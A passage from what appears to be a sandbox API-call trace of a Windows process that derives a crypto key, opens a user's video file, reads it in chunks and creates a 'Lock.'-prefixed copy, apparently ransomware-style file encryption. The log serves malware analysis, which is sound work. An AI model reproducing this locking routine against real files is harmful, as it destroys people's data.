lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.643] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0212.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.643] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.643] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.643] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.644] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.644] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.644] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0212.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab5d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0212.644] CryptHashData (hHash=0x9e21f8, pbData=0x2a71ce8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0212.644] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.644] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.644] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.644] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.644] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.644] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.644] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.644] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.644] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.644] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.644] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.644] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.644] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.644] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0212.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab620, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0212.645] CryptDeriveKey (in: hProv=0xa7ca18, Algid=0x6601, hBaseData=0x9e21f8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2238) returned 1 [0212.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.645] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.645] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.645] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.645] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.653] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.654] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0212.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6e80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0212.654] CryptDestroyHash (hHash=0x9e21f8) returned 1 [0212.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866c48 [0212.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0212.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0212.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0212.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0212.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0212.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0212.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0212.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0212.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0212.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0212.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0212.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0212.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0212.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.655] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.655] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.655] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.655] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0212.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.655] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/kmyLNxqbxySO-S_H2O9.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kmylnxqbxyso-s_h2o9.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0212.656] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.656] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0212.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0212.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.657] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0212.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0212.657] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0212.657] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0212.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0212.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0212.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74bf0 [0212.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.658] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0212.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74bf0 | out: hHeap=0x2af0000) returned 1 [0212.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0212.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0212.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0212.659] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.kmyLNxqbxySO-S_H2O9.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\lock.kmylnxqbxyso-s_h2o9.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0212.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7220 [0212.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.660] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0212.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0212.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0212.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0212.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0212.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0212.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0212.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0212.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ea020 [0212.665] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0212.665] ReadFile (in: hFile=0x4f4, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0212.668] ReadFile (in: hFile=0x4f4, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x31b0, lpOverlapped=0x0) returned 1 [0212.668] ReadFile (in: hFile=0x4f4, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0212.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0212.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x131b0) returned 0x2a8a138 [0212.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ea020 | out: hHeap=0x2af0000) returned 1 [0212.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0212.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x131b0) returned 0x2aae878 [0212.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0212.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.674] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.674] RtlAllocateHeap 